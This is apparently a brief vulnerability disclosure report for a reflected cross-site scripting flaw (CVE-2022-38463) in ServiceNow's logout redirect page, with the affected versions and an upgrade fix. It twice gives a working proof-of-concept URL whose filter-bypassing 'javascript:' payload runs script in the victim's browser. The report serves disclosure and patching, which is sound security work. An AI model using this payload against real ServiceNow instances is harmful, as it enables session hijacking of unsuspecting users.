Description:
XSS in ServiceNow logout
https://██████:443/logout_redirect.do?sysparm_url=//j\\javascript%3Aalert(document.domain)
https://nvd.nist.gov/vuln/detail/CVE-2022-38463
Unauthenticated remote attacker can execute code in user’s browser context. User must click on malicious link
███████
Servicenow prior to SanDiego SP6
CVE-2022-38463
Click on https://█████:443/logout_redirect.do?sysparm_url=//j\\javascript%3Aalert(document.domain)
Upgrade to patched version of ServiceNow